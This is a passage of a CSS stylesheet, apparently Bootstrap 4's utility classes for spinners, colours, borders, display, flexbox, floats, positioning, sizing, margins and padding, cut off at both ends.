height: 2rem;
vertical-align: text-bottom;
border: 0.25em solid currentColor;
border-right-color: transparent;
border-radius: 50%;
-webkit-animation: spinner-border .75s linear infinite;
animation: spinner-border .75s linear infinite;
}
.spinner-border-sm {
width: 1rem;
height: 1rem;
border-width: 0.2em;
}
@-webkit-keyframes spinner-grow {
0% {
-webkit-transform: scale(0);
transform: scale(0);
}
50% {
opacity: 1;
}
}
@keyframes spinner-grow {
0% {
-webkit-transform: scale(0);
transform: scale(0);
}
50% {
opacity: 1;
}
}
.spinner-grow {
display: inline-block;
width: 2rem;
height: 2rem;
vertical-align: text-bottom;
background-color: currentColor;
border-radius: 50%;
opacity: 0;
-webkit-animation: spinner-grow .75s linear infinite;
animation: spinner-grow .75s linear infinite;
}
.spinner-grow-sm {
width: 1rem;
height: 1rem;
}
.align-baseline {
vertical-align: baseline !important;
}
.align-top {
vertical-align: top !important;
}
.align-middle {
vertical-align: middle !important;
}
.align-bottom {
vertical-align: bottom !important;
}
.align-text-bottom {
vertical-align: text-bottom !important;
}
.align-text-top {
vertical-align: text-top !important;
}
.bg-primary {
background-color: #007bff !important;
}
a.bg-primary:hover, a.bg-primary:focus,
button.bg-primary:hover,
button.bg-primary:focus {
background-color: #0062cc !important;
}
.bg-secondary {
background-color: #6c757d !important;
}
a.bg-secondary:hover, a.bg-secondary:focus,
button.bg-secondary:hover,
button.bg-secondary:focus {
background-color: #545b62 !important;
}
.bg-success {
background-color: #28a745 !important;
}
a.bg-success:hover, a.bg-success:focus,
button.bg-success:hover,
button.bg-success:focus {
background-color: #1e7e34 !important;
}
.bg-info {
background-color: #17a2b8 !important;
}
a.bg-info:hover, a.bg-info:focus,
button.bg-info:hover,
button.bg-info:focus {
background-color: #117a8b !important;
}
.bg-warning {
background-color: #ffc107 !important;
}
a.bg-warning:hover, a.bg-warning:focus,
button.bg-warning:hover,
button.bg-warning:focus {
background-color: #d39e00 !important;
}
.bg-danger {
background-color: #dc3545 !important;
}
a.bg-danger:hover, a.bg-danger:focus,
button.bg-danger:hover,
button.bg-danger:focus {
background-color: #bd2130 !important;
}
.bg-light {
background-color: #f8f9fa !important;
}
a.bg-light:hover, a.bg-light:focus,
button.bg-light:hover,
button.bg-light:focus {
background-color: #dae0e5 !important;
}
.bg-dark {
background-color: #343a40 !important;
}
a.bg-dark:hover, a.bg-dark:focus,
button.bg-dark:hover,
button.bg-dark:focus {
background-color: #1d2124 !important;
}
.bg-white {
background-color: #ffffff !important;
}
.bg-transparent {
background-color: transparent !important;
}
.border {
border: 1px solid #dee2e6 !important;
}
.border-top {
border-top: 1px solid #dee2e6 !important;
}
.border-right {
border-right: 1px solid #dee2e6 !important;
}
.border-bottom {
border-bottom: 1px solid #dee2e6 !important;
}
.border-left {
border-left: 1px solid #dee2e6 !important;
}
.border-0 {
border: 0 !important;
}
.border-top-0 {
border-top: 0 !important;
}
.border-right-0 {
border-right: 0 !important;
}
.border-bottom-0 {
border-bottom: 0 !important;
}
.border-left-0 {
border-left: 0 !important;
}
.border-primary {
border-color: #007bff !important;
}
.border-secondary {
border-color: #6c757d !important;
}
.border-success {
border-color: #28a745 !important;
}
.border-info {
border-color: #17a2b8 !important;
}
.border-warning {
border-color: #ffc107 !important;
}
.border-danger {
border-color: #dc3545 !important;
}
.border-light {
border-color: #f8f9fa !important;
}
.border-dark {
border-color: #343a40 !important;
}
.border-white {
border-color: #ffffff !important;
}
.rounded-sm {
border-radius: 0.2rem !important;
}
.rounded {
border-radius: 0.25rem !important;
}
.rounded-top {
border-top-left-radius: 0.25rem !important;
border-top-right-radius: 0.25rem !important;
}
.rounded-right {
border-top-right-radius: 0.25rem !important;
border-bottom-right-radius: 0.25rem !important;
}
.rounded-bottom {
border-bottom-right-radius: 0.25rem !important;
border-bottom-left-radius: 0.25rem !important;
}
.rounded-left {
border-top-left-radius: 0.25rem !important;
border-bottom-left-radius: 0.25rem !important;
}
.rounded-lg {
border-radius: 0.3rem !important;
}
.rounded-circle {
border-radius: 50% !important;
}
.rounded-pill {
border-radius: 50rem !important;
}
.rounded-0 {
border-radius: 0 !important;
}
.clearfix::after {
display: block;
clear: both;
content: "";
}
.d-none {
display: none !important;
}
.d-inline {
display: inline !important;
}
.d-inline-block {
display: inline-block !important;
}
.d-block {
display: block !important;
}
.d-table {
display: table !important;
}
.d-table-row {
display: table-row !important;
}
.d-table-cell {
display: table-cell !important;
}
.d-flex {
display: -ms-flexbox !important;
display: flex !important;
}
.d-inline-flex {
display: -ms-inline-flexbox !important;
display: inline-flex !important;
}
@media (min-width: 576px) {
.d-sm-none {
display: none !important;
}
.d-sm-inline {
display: inline !important;
}
.d-sm-inline-block {
display: inline-block !important;
}
.d-sm-block {
display: block !important;
}
.d-sm-table {
display: table !important;
}
.d-sm-table-row {
display: table-row !important;
}
.d-sm-table-cell {
display: table-cell !important;
}
.d-sm-flex {
display: -ms-flexbox !important;
display: flex !important;
}
.d-sm-inline-flex {
display: -ms-inline-flexbox !important;
display: inline-flex !important;
}
}
@media (min-width: 768px) {
.d-md-none {
display: none !important;
}
.d-md-inline {
display: inline !important;
}
.d-md-inline-block {
display: inline-block !important;
}
.d-md-block {
display: block !important;
}
.d-md-table {
display: table !important;
}
.d-md-table-row {
display: table-row !important;
}
.d-md-table-cell {
display: table-cell !important;
}
.d-md-flex {
display: -ms-flexbox !important;
display: flex !important;
}
.d-md-inline-flex {
display: -ms-inline-flexbox !important;
display: inline-flex !important;
}
}
@media (min-width: 992px) {
.d-lg-none {
display: none !important;
}
.d-lg-inline {
display: inline !important;
}
.d-lg-inline-block {
display: inline-block !important;
}
.d-lg-block {
display: block !important;
}
.d-lg-table {
display: table !important;
}
.d-lg-table-row {
display: table-row !important;
}
.d-lg-table-cell {
display: table-cell !important;
}
.d-lg-flex {
display: -ms-flexbox !important;
display: flex !important;
}
.d-lg-inline-flex {
display: -ms-inline-flexbox !important;
display: inline-flex !important;
}
}
@media (min-width: 1200px) {
.d-xl-none {
display: none !important;
}
.d-xl-inline {
display: inline !important;
}
.d-xl-inline-block {
display: inline-block !important;
}
.d-xl-block {
display: block !important;
}
.d-xl-table {
display: table !important;
}
.d-xl-table-row {
display: table-row !important;
}
.d-xl-table-cell {
display: table-cell !important;
}
.d-xl-flex {
display: -ms-flexbox !important;
display: flex !important;
}
.d-xl-inline-flex {
display: -ms-inline-flexbox !important;
display: inline-flex !important;
}
}
@media print {
.d-print-none {
display: none !important;
}
.d-print-inline {
display: inline !important;
}
.d-print-inline-block {
display: inline-block !important;
}
.d-print-block {
display: block !important;
}
.d-print-table {
display: table !important;
}
.d-print-table-row {
display: table-row !important;
}
.d-print-table-cell {
display: table-cell !important;
}
.d-print-flex {
display: -ms-flexbox !important;
display: flex !important;
}
.d-print-inline-flex {
display: -ms-inline-flexbox !important;
display: inline-flex !important;
}
}
.embed-responsive {
position: relative;
display: block;
width: 100%;
padding: 0;
overflow: hidden;
}
.embed-responsive::before {
display: block;
content: "";
}
.embed-responsive .embed-responsive-item,
.embed-responsive iframe,
.embed-responsive embed,
.embed-responsive object,
.embed-responsive video {
position: absolute;
top: 0;
bottom: 0;
left: 0;
width: 100%;
height: 100%;
border: 0;
}
.embed-responsive-21by9::before {
padding-top: 42.857143%;
}
.embed-responsive-16by9::before {
padding-top: 56.25%;
}
.embed-responsive-4by3::before {
padding-top: 75%;
}
.embed-responsive-1by1::before {
padding-top: 100%;
}
.flex-row {
-ms-flex-direction: row !important;
flex-direction: row !important;
}
.flex-column {
-ms-flex-direction: column !important;
flex-direction: column !important;
}
.flex-row-reverse {
-ms-flex-direction: row-reverse !important;
flex-direction: row-reverse !important;
}
.flex-column-reverse {
-ms-flex-direction: column-reverse !important;
flex-direction: column-reverse !important;
}
.flex-wrap {
-ms-flex-wrap: wrap !important;
flex-wrap: wrap !important;
}
.flex-nowrap {
-ms-flex-wrap: nowrap !important;
flex-wrap: nowrap !important;
}
.flex-wrap-reverse {
-ms-flex-wrap: wrap-reverse !important;
flex-wrap: wrap-reverse !important;
}
.flex-fill {
-ms-flex: 1 1 auto !important;
flex: 1 1 auto !important;
}
.flex-grow-0 {
-ms-flex-positive: 0 !important;
flex-grow: 0 !important;
}
.flex-grow-1 {
-ms-flex-positive: 1 !important;
flex-grow: 1 !important;
}
.flex-shrink-0 {
-ms-flex-negative: 0 !important;
flex-shrink: 0 !important;
}
.flex-shrink-1 {
-ms-flex-negative: 1 !important;
flex-shrink: 1 !important;
}
.justify-content-start {
-ms-flex-pack: start !important;
justify-content: flex-start !important;
}
.justify-content-end {
-ms-flex-pack: end !important;
justify-content: flex-end !important;
}
.justify-content-center {
-ms-flex-pack: center !important;
justify-content: center !important;
}
.justify-content-between {
-ms-flex-pack: justify !important;
justify-content: space-between !important;
}
.justify-content-around {
-ms-flex-pack: distribute !important;
justify-content: space-around !important;
}
.align-items-start {
-ms-flex-align: start !important;
align-items: flex-start !important;
}
.align-items-end {
-ms-flex-align: end !important;
align-items: flex-end !important;
}
.align-items-center {
-ms-flex-align: center !important;
align-items: center !important;
}
.align-items-baseline {
-ms-flex-align: baseline !important;
align-items: baseline !important;
}
.align-items-stretch {
-ms-flex-align: stretch !important;
align-items: stretch !important;
}
.align-content-start {
-ms-flex-line-pack: start !important;
align-content: flex-start !important;
}
.align-content-end {
-ms-flex-line-pack: end !important;
align-content: flex-end !important;
}
.align-content-center {
-ms-flex-line-pack: center !important;
align-content: center !important;
}
.align-content-between {
-ms-flex-line-pack: justify !important;
align-content: space-between !important;
}
.align-content-around {
-ms-flex-line-pack: distribute !important;
align-content: space-around !important;
}
.align-content-stretch {
-ms-flex-line-pack: stretch !important;
align-content: stretch !important;
}
.align-self-auto {
-ms-flex-item-align: auto !important;
align-self: auto !important;
}
.align-self-start {
-ms-flex-item-align: start !important;
align-self: flex-start !important;
}
.align-self-end {
-ms-flex-item-align: end !important;
align-self: flex-end !important;
}
.align-self-center {
-ms-flex-item-align: center !important;
align-self: center !important;
}
.align-self-baseline {
-ms-flex-item-align: baseline !important;
align-self: baseline !important;
}
.align-self-stretch {
-ms-flex-item-align: stretch !important;
align-self: stretch !important;
}
@media (min-width: 576px) {
.flex-sm-row {
-ms-flex-direction: row !important;
flex-direction: row !important;
}
.flex-sm-column {
-ms-flex-direction: column !important;
flex-direction: column !important;
}
.flex-sm-row-reverse {
-ms-flex-direction: row-reverse !important;
flex-direction: row-reverse !important;
}
.flex-sm-column-reverse {
-ms-flex-direction: column-reverse !important;
flex-direction: column-reverse !important;
}
.flex-sm-wrap {
-ms-flex-wrap: wrap !important;
flex-wrap: wrap !important;
}
.flex-sm-nowrap {
-ms-flex-wrap: nowrap !important;
flex-wrap: nowrap !important;
}
.flex-sm-wrap-reverse {
-ms-flex-wrap: wrap-reverse !important;
flex-wrap: wrap-reverse !important;
}
.flex-sm-fill {
-ms-flex: 1 1 auto !important;
flex: 1 1 auto !important;
}
.flex-sm-grow-0 {
-ms-flex-positive: 0 !important;
flex-grow: 0 !important;
}
.flex-sm-grow-1 {
-ms-flex-positive: 1 !important;
flex-grow: 1 !important;
}
.flex-sm-shrink-0 {
-ms-flex-negative: 0 !important;
flex-shrink: 0 !important;
}
.flex-sm-shrink-1 {
-ms-flex-negative: 1 !important;
flex-shrink: 1 !important;
}
.justify-content-sm-start {
-ms-flex-pack: start !important;
justify-content: flex-start !important;
}
.justify-content-sm-end {
-ms-flex-pack: end !important;
justify-content: flex-end !important;
}
.justify-content-sm-center {
-ms-flex-pack: center !important;
justify-content: center !important;
}
.justify-content-sm-between {
-ms-flex-pack: justify !important;
justify-content: space-between !important;
}
.justify-content-sm-around {
-ms-flex-pack: distribute !important;
justify-content: space-around !important;
}
.align-items-sm-start {
-ms-flex-align: start !important;
align-items: flex-start !important;
}
.align-items-sm-end {
-ms-flex-align: end !important;
align-items: flex-end !important;
}
.align-items-sm-center {
-ms-flex-align: center !important;
align-items: center !important;
}
.align-items-sm-baseline {
-ms-flex-align: baseline !important;
align-items: baseline !important;
}
.align-items-sm-stretch {
-ms-flex-align: stretch !important;
align-items: stretch !important;
}
.align-content-sm-start {
-ms-flex-line-pack: start !important;
align-content: flex-start !important;
}
.align-content-sm-end {
-ms-flex-line-pack: end !important;
align-content: flex-end !important;
}
.align-content-sm-center {
-ms-flex-line-pack: center !important;
align-content: center !important;
}
.align-content-sm-between {
-ms-flex-line-pack: justify !important;
align-content: space-between !important;
}
.align-content-sm-around {
-ms-flex-line-pack: distribute !important;
align-content: space-around !important;
}
.align-content-sm-stretch {
-ms-flex-line-pack: stretch !important;
align-content: stretch !important;
}
.align-self-sm-auto {
-ms-flex-item-align: auto !important;
align-self: auto !important;
}
.align-self-sm-start {
-ms-flex-item-align: start !important;
align-self: flex-start !important;
}
.align-self-sm-end {
-ms-flex-item-align: end !important;
align-self: flex-end !important;
}
.align-self-sm-center {
-ms-flex-item-align: center !important;
align-self: center !important;
}
.align-self-sm-baseline {
-ms-flex-item-align: baseline !important;
align-self: baseline !important;
}
.align-self-sm-stretch {
-ms-flex-item-align: stretch !important;
align-self: stretch !important;
}
}
@media (min-width: 768px) {
.flex-md-row {
-ms-flex-direction: row !important;
flex-direction: row !important;
}
.flex-md-column {
-ms-flex-direction: column !important;
flex-direction: column !important;
}
.flex-md-row-reverse {
-ms-flex-direction: row-reverse !important;
flex-direction: row-reverse !important;
}
.flex-md-column-reverse {
-ms-flex-direction: column-reverse !important;
flex-direction: column-reverse !important;
}
.flex-md-wrap {
-ms-flex-wrap: wrap !important;
flex-wrap: wrap !important;
}
.flex-md-nowrap {
-ms-flex-wrap: nowrap !important;
flex-wrap: nowrap !important;
}
.flex-md-wrap-reverse {
-ms-flex-wrap: wrap-reverse !important;
flex-wrap: wrap-reverse !important;
}
.flex-md-fill {
-ms-flex: 1 1 auto !important;
flex: 1 1 auto !important;
}
.flex-md-grow-0 {
-ms-flex-positive: 0 !important;
flex-grow: 0 !important;
}
.flex-md-grow-1 {
-ms-flex-positive: 1 !important;
flex-grow: 1 !important;
}
.flex-md-shrink-0 {
-ms-flex-negative: 0 !important;
flex-shrink: 0 !important;
}
.flex-md-shrink-1 {
-ms-flex-negative: 1 !important;
flex-shrink: 1 !important;
}
.justify-content-md-start {
-ms-flex-pack: start !important;
justify-content: flex-start !important;
}
.justify-content-md-end {
-ms-flex-pack: end !important;
justify-content: flex-end !important;
}
.justify-content-md-center {
-ms-flex-pack: center !important;
justify-content: center !important;
}
.justify-content-md-between {
-ms-flex-pack: justify !important;
justify-content: space-between !important;
}
.justify-content-md-around {
-ms-flex-pack: distribute !important;
justify-content: space-around !important;
}
.align-items-md-start {
-ms-flex-align: start !important;
align-items: flex-start !important;
}
.align-items-md-end {
-ms-flex-align: end !important;
align-items: flex-end !important;
}
.align-items-md-center {
-ms-flex-align: center !important;
align-items: center !important;
}
.align-items-md-baseline {
-ms-flex-align: baseline !important;
align-items: baseline !important;
}
.align-items-md-stretch {
-ms-flex-align: stretch !important;
align-items: stretch !important;
}
.align-content-md-start {
-ms-flex-line-pack: start !important;
align-content: flex-start !important;
}
.align-content-md-end {
-ms-flex-line-pack: end !important;
align-content: flex-end !important;
}
.align-content-md-center {
-ms-flex-line-pack: center !important;
align-content: center !important;
}
.align-content-md-between {
-ms-flex-line-pack: justify !important;
align-content: space-between !important;
}
.align-content-md-around {
-ms-flex-line-pack: distribute !important;
align-content: space-around !important;
}
.align-content-md-stretch {
-ms-flex-line-pack: stretch !important;
align-content: stretch !important;
}
.align-self-md-auto {
-ms-flex-item-align: auto !important;
align-self: auto !important;
}
.align-self-md-start {
-ms-flex-item-align: start !important;
align-self: flex-start !important;
}
.align-self-md-end {
-ms-flex-item-align: end !important;
align-self: flex-end !important;
}
.align-self-md-center {
-ms-flex-item-align: center !important;
align-self: center !important;
}
.align-self-md-baseline {
-ms-flex-item-align: baseline !important;
align-self: baseline !important;
}
.align-self-md-stretch {
-ms-flex-item-align: stretch !important;
align-self: stretch !important;
}
}
@media (min-width: 992px) {
.flex-lg-row {
-ms-flex-direction: row !important;
flex-direction: row !important;
}
.flex-lg-column {
-ms-flex-direction: column !important;
flex-direction: column !important;
}
.flex-lg-row-reverse {
-ms-flex-direction: row-reverse !important;
flex-direction: row-reverse !important;
}
.flex-lg-column-reverse {
-ms-flex-direction: column-reverse !important;
flex-direction: column-reverse !important;
}
.flex-lg-wrap {
-ms-flex-wrap: wrap !important;
flex-wrap: wrap !important;
}
.flex-lg-nowrap {
-ms-flex-wrap: nowrap !important;
flex-wrap: nowrap !important;
}
.flex-lg-wrap-reverse {
-ms-flex-wrap: wrap-reverse !important;
flex-wrap: wrap-reverse !important;
}
.flex-lg-fill {
-ms-flex: 1 1 auto !important;
flex: 1 1 auto !important;
}
.flex-lg-grow-0 {
-ms-flex-positive: 0 !important;
flex-grow: 0 !important;
}
.flex-lg-grow-1 {
-ms-flex-positive: 1 !important;
flex-grow: 1 !important;
}
.flex-lg-shrink-0 {
-ms-flex-negative: 0 !important;
flex-shrink: 0 !important;
}
.flex-lg-shrink-1 {
-ms-flex-negative: 1 !important;
flex-shrink: 1 !important;
}
.justify-content-lg-start {
-ms-flex-pack: start !important;
justify-content: flex-start !important;
}
.justify-content-lg-end {
-ms-flex-pack: end !important;
justify-content: flex-end !important;
}
.justify-content-lg-center {
-ms-flex-pack: center !important;
justify-content: center !important;
}
.justify-content-lg-between {
-ms-flex-pack: justify !important;
justify-content: space-between !important;
}
.justify-content-lg-around {
-ms-flex-pack: distribute !important;
justify-content: space-around !important;
}
.align-items-lg-start {
-ms-flex-align: start !important;
align-items: flex-start !important;
}
.align-items-lg-end {
-ms-flex-align: end !important;
align-items: flex-end !important;
}
.align-items-lg-center {
-ms-flex-align: center !important;
align-items: center !important;
}
.align-items-lg-baseline {
-ms-flex-align: baseline !important;
align-items: baseline !important;
}
.align-items-lg-stretch {
-ms-flex-align: stretch !important;
align-items: stretch !important;
}
.align-content-lg-start {
-ms-flex-line-pack: start !important;
align-content: flex-start !important;
}
.align-content-lg-end {
-ms-flex-line-pack: end !important;
align-content: flex-end !important;
}
.align-content-lg-center {
-ms-flex-line-pack: center !important;
align-content: center !important;
}
.align-content-lg-between {
-ms-flex-line-pack: justify !important;
align-content: space-between !important;
}
.align-content-lg-around {
-ms-flex-line-pack: distribute !important;
align-content: space-around !important;
}
.align-content-lg-stretch {
-ms-flex-line-pack: stretch !important;
align-content: stretch !important;
}
.align-self-lg-auto {
-ms-flex-item-align: auto !important;
align-self: auto !important;
}
.align-self-lg-start {
-ms-flex-item-align: start !important;
align-self: flex-start !important;
}
.align-self-lg-end {
-ms-flex-item-align: end !important;
align-self: flex-end !important;
}
.align-self-lg-center {
-ms-flex-item-align: center !important;
align-self: center !important;
}
.align-self-lg-baseline {
-ms-flex-item-align: baseline !important;
align-self: baseline !important;
}
.align-self-lg-stretch {
-ms-flex-item-align: stretch !important;
align-self: stretch !important;
}
}
@media (min-width: 1200px) {
.flex-xl-row {
-ms-flex-direction: row !important;
flex-direction: row !important;
}
.flex-xl-column {
-ms-flex-direction: column !important;
flex-direction: column !important;
}
.flex-xl-row-reverse {
-ms-flex-direction: row-reverse !important;
flex-direction: row-reverse !important;
}
.flex-xl-column-reverse {
-ms-flex-direction: column-reverse !important;
flex-direction: column-reverse !important;
}
.flex-xl-wrap {
-ms-flex-wrap: wrap !important;
flex-wrap: wrap !important;
}
.flex-xl-nowrap {
-ms-flex-wrap: nowrap !important;
flex-wrap: nowrap !important;
}
.flex-xl-wrap-reverse {
-ms-flex-wrap: wrap-reverse !important;
flex-wrap: wrap-reverse !important;
}
.flex-xl-fill {
-ms-flex: 1 1 auto !important;
flex: 1 1 auto !important;
}
.flex-xl-grow-0 {
-ms-flex-positive: 0 !important;
flex-grow: 0 !important;
}
.flex-xl-grow-1 {
-ms-flex-positive: 1 !important;
flex-grow: 1 !important;
}
.flex-xl-shrink-0 {
-ms-flex-negative: 0 !important;
flex-shrink: 0 !important;
}
.flex-xl-shrink-1 {
-ms-flex-negative: 1 !important;
flex-shrink: 1 !important;
}
.justify-content-xl-start {
-ms-flex-pack: start !important;
justify-content: flex-start !important;
}
.justify-content-xl-end {
-ms-flex-pack: end !important;
justify-content: flex-end !important;
}
.justify-content-xl-center {
-ms-flex-pack: center !important;
justify-content: center !important;
}
.justify-content-xl-between {
-ms-flex-pack: justify !important;
justify-content: space-between !important;
}
.justify-content-xl-around {
-ms-flex-pack: distribute !important;
justify-content: space-around !important;
}
.align-items-xl-start {
-ms-flex-align: start !important;
align-items: flex-start !important;
}
.align-items-xl-end {
-ms-flex-align: end !important;
align-items: flex-end !important;
}
.align-items-xl-center {
-ms-flex-align: center !important;
align-items: center !important;
}
.align-items-xl-baseline {
-ms-flex-align: baseline !important;
align-items: baseline !important;
}
.align-items-xl-stretch {
-ms-flex-align: stretch !important;
align-items: stretch !important;
}
.align-content-xl-start {
-ms-flex-line-pack: start !important;
align-content: flex-start !important;
}
.align-content-xl-end {
-ms-flex-line-pack: end !important;
align-content: flex-end !important;
}
.align-content-xl-center {
-ms-flex-line-pack: center !important;
align-content: center !important;
}
.align-content-xl-between {
-ms-flex-line-pack: justify !important;
align-content: space-between !important;
}
.align-content-xl-around {
-ms-flex-line-pack: distribute !important;
align-content: space-around !important;
}
.align-content-xl-stretch {
-ms-flex-line-pack: stretch !important;
align-content: stretch !important;
}
.align-self-xl-auto {
-ms-flex-item-align: auto !important;
align-self: auto !important;
}
.align-self-xl-start {
-ms-flex-item-align: start !important;
align-self: flex-start !important;
}
.align-self-xl-end {
-ms-flex-item-align: end !important;
align-self: flex-end !important;
}
.align-self-xl-center {
-ms-flex-item-align: center !important;
align-self: center !important;
}
.align-self-xl-baseline {
-ms-flex-item-align: baseline !important;
align-self: baseline !important;
}
.align-self-xl-stretch {
-ms-flex-item-align: stretch !important;
align-self: stretch !important;
}
}
.float-left {
float: left !important;
}
.float-right {
float: right !important;
}
.float-none {
float: none !important;
}
@media (min-width: 576px) {
.float-sm-left {
float: left !important;
}
.float-sm-right {
float: right !important;
}
.float-sm-none {
float: none !important;
}
}
@media (min-width: 768px) {
.float-md-left {
float: left !important;
}
.float-md-right {
float: right !important;
}
.float-md-none {
float: none !important;
}
}
@media (min-width: 992px) {
.float-lg-left {
float: left !important;
}
.float-lg-right {
float: right !important;
}
.float-lg-none {
float: none !important;
}
}
@media (min-width: 1200px) {
.float-xl-left {
float: left !important;
}
.float-xl-right {
float: right !important;
}
.float-xl-none {
float: none !important;
}
}
.overflow-auto {
overflow: auto !important;
}
.overflow-hidden {
overflow: hidden !important;
}
.position-static {
position: static !important;
}
.position-relative {
position: relative !important;
}
.position-absolute {
position: absolute !important;
}
.position-fixed {
position: fixed !important;
}
.position-sticky {
position: -webkit-sticky !important;
position: sticky !important;
}
.fixed-top {
position: fixed;
top: 0;
right: 0;
left: 0;
z-index: 1030;
}
.fixed-bottom {
position: fixed;
right: 0;
bottom: 0;
left: 0;
z-index: 1030;
}
@supports ((position: -webkit-sticky) or (position: sticky)) {
.sticky-top {
position: -webkit-sticky;
position: sticky;
top: 0;
z-index: 1020;
}
}
.sr-only {
position: absolute;
width: 1px;
height: 1px;
padding: 0;
overflow: hidden;
clip: rect(0, 0, 0, 0);
white-space: nowrap;
border: 0;
}
.sr-only-focusable:active, .sr-only-focusable:focus {
position: static;
width: auto;
height: auto;
overflow: visible;
clip: auto;
white-space: normal;
}
.shadow-sm {
box-shadow: 0 0.125rem 0.25rem rgba(0, 0, 0, 0.075) !important;
}
.shadow {
box-shadow: 0 0.5rem 1rem rgba(0, 0, 0, 0.15) !important;
}
.shadow-lg {
box-shadow: 0 1rem 3rem rgba(0, 0, 0, 0.175) !important;
}
.shadow-none {
box-shadow: none !important;
}
.w-25 {
width: 25% !important;
}
.w-50 {
width: 50% !important;
}
.w-75 {
width: 75% !important;
}
.w-100 {
width: 100% !important;
}
.w-auto {
width: auto !important;
}
.h-25 {
height: 25% !important;
}
.h-50 {
height: 50% !important;
}
.h-75 {
height: 75% !important;
}
.h-100 {
height: 100% !important;
}
.h-auto {
height: auto !important;
}
.mw-100 {
max-width: 100% !important;
}
.mh-100 {
max-height: 100% !important;
}
.min-vw-100 {
min-width: 100vw !important;
}
.min-vh-100 {
min-height: 100vh !important;
}
.vw-100 {
width: 100vw !important;
}
.vh-100 {
height: 100vh !important;
}
.stretched-link::after {
position: absolute;
top: 0;
right: 0;
bottom: 0;
left: 0;
z-index: 1;
pointer-events: auto;
content: "";
background-color: rgba(0, 0, 0, 0);
}
.m-0 {
margin: 0 !important;
}
.mt-0,
.my-0 {
margin-top: 0 !important;
}
.mr-0,
.mx-0 {
margin-right: 0 !important;
}
.mb-0,
.my-0 {
margin-bottom: 0 !important;
}
.ml-0,
.mx-0 {
margin-left: 0 !important;
}
.m-1 {
margin: 0.25rem !important;
}
.mt-1,
.my-1 {
margin-top: 0.25rem !important;
}
.mr-1,
.mx-1 {
margin-right: 0.25rem !important;
}
.mb-1,
.my-1 {
margin-bottom: 0.25rem !important;
}
.ml-1,
.mx-1 {
margin-left: 0.25rem !important;
}
.m-2 {
margin: 0.5rem !important;
}
.mt-2,
.my-2 {
margin-top: 0.5rem !important;
}
.mr-2,
.mx-2 {
margin-right: 0.5rem !important;
}
.mb-2,
.my-2 {
margin-bottom: 0.5rem !important;
}
.ml-2,
.mx-2 {
margin-left: 0.5rem !important;
}
.m-3 {
margin: 1rem !important;
}
.mt-3,
.my-3 {
margin-top: 1rem !important;
}
.mr-3,
.mx-3 {
margin-right: 1rem !important;
}
.mb-3,
.my-3 {
margin-bottom: 1rem !important;
}
.ml-3,
.mx-3 {
margin-left: 1rem !important;
}
.m-4 {
margin: 1.5rem !important;
}
.mt-4,
.my-4 {
margin-top: 1.5rem !important;
}
.mr-4,
.mx-4 {
margin-right: 1.5rem !important;
}
.mb-4,
.my-4 {
margin-bottom: 1.5rem !important;
}
.ml-4,
.mx-4 {
margin-left: 1.5rem !important;
}
.m-5 {
margin: 3rem !important;
}
.mt-5,
.my-5 {
margin-top: 3rem !important;
}
.mr-5,
.mx-5 {
margin-right: 3rem !important;
}
.mb-5,
.my-5 {
margin-bottom: 3rem !important;
}
.ml-5,
.mx-5 {
margin-left: 3rem !important;
}
.p-0 {
padding: 0 !important;
}
.pt-0,
.py-0 {
padding-top: 0 !important;
}
.pr-0,
.px-0 {
padding-right: 0 !important;
}
.pb-0,
.py-0 {
padding-bottom: 0 !important;
}
.pl-0,
.px-0 {
padding-left: 0 !important;
}
.p-1 {
padding: 0.25rem !important;
}
.pt-1,
.py-1 {
padding-top: 0.25rem !important;
}
.pr-1,
.px-1 {
padding-right: 0.25rem !important;
}
.pb-1,
.py-1 {
padding-bottom: 0.25rem !important;
}
.pl-1,
.px-1 {
padding-left: 0.25rem !important;
}
.p-2 {
padding: 0.5rem !important;
}
.pt-2,
.py-2 {
padding-top: 0.5rem !important;
}
.pr-2,
.px-2 {
padding-right: 0.5rem !important;
}
.pb-2,
.py-2 {
padding-bottom: 0.5rem !important;
}
.pl-2,
.px-2 {
padding-left: 0.5rem !important;
}
.p-3 {
padding: 1rem !important;
}
.pt-3,
.py-3 {
padding-top: 1rem !important;
}
.pr-3,
.px-3 {
padding-right: 1rem !important;
}
.pb-3,
.py-3 {
padding-bottom: 1rem !important;
}
.pl-3,
.px-3 {
padding-left: 1rem !important;
}
.p-4 {
padding: 1.5rem !important;
}
.pt-4,
.py-4 {
padding-top: 1.5rem !important;
}
.pr-4,
.px-4 {
padding-right: 1.5rem !important;
}
.pb-4,
.py-4 {
padding-bottom: 1.5rem !important;
}
.pl-4,
.px-4 {
padding-left: 1.5rem !important;
}
.p-5 {
padding: 3rem !important;
}
.pt-5,
.py-5 {
padding-top: 3rem !important;
}
.pr-5,
.px-5 {
padding-right: 3rem !important;
}
.pb-5,
.py-5 {
padding-bottom: 3rem !important;
}
.pl-5,
.px-5 {
padding-left: 3rem !important;
}
.m-n1 {
margin: -0.25rem !important;
}
.mt-n1,
.my-n1 {
margin-top: -0.25rem !important;
}
.mr-n1,
.mx-n1 {
margin-right: -0.25rem !important;
}
.mb-n1,
.my-n1 {
margin-bottom: -0.25rem !important;
}
.ml-n1,
.mx-n1 {
margin-left: -0.25rem !important;
}
.m-n2 {
margin: -0.5rem !important;
}
.mt-n2,
.my-n2 {
margin-top: -0.5rem !important;
}
.mr-n2,
.mx-n2 {
margin-right: -0.5rem !important;
}
.mb-n2,
.my-n2 {
margin-bottom: -0.5rem !important;
}
.ml-n2,
.mx-n2 {
margin-left: -0.5rem !important;
}
.m-n3 {
margin: -1rem !important;
}
.mt-n3,
.my-n3 {
margin-top: -1rem !important;
}
.mr-n3,
.mx-n3 {
margin-right: -1rem !important;
}
.mb-n3,
.my-n3 {
margin-bottom: -1rem !important;
}
.ml-n3,
.mx-n3 {
margin-left: -1rem !important;
}
.m-n4 {
margin: -1.5rem !important;
}
.mt-n4,
.my-n4 {
margin-top: -1.5rem !important;
}
.mr-n4,
.mx-n4 {
margin-right: -1.5rem !important;
}
.mb-n4,
.my-n4 {
margin-bottom: -1.5rem !important;
}
.ml-n4,
.mx-n4 {
margin-left: -1.5rem !important;
}
.m-n5 {
margin: -3rem !important;
}
.mt-n5,
.my-n5 {
margin-top: -3rem !important;
}
.mr-n5,
.mx-n5 {
margin-right: -3rem !important;
}
.mb-n5,
.my-n5 {
margin-bottom: -3rem !important;
}
.ml-n5,
.mx-n5 {
margin-left: -3rem !important;
}
.m-auto {
margin: auto !important;
}
.mt-auto,
.my-auto {
margin-top: auto !important;
}
.mr-auto,
.mx-auto {
margin-right: auto !important;
}
.mb-auto,
.my-auto {
margin-bottom: auto !important;
}
.ml-auto,
.mx-auto {
margin-left: auto !important;
}
@media (min-width: 576px) {
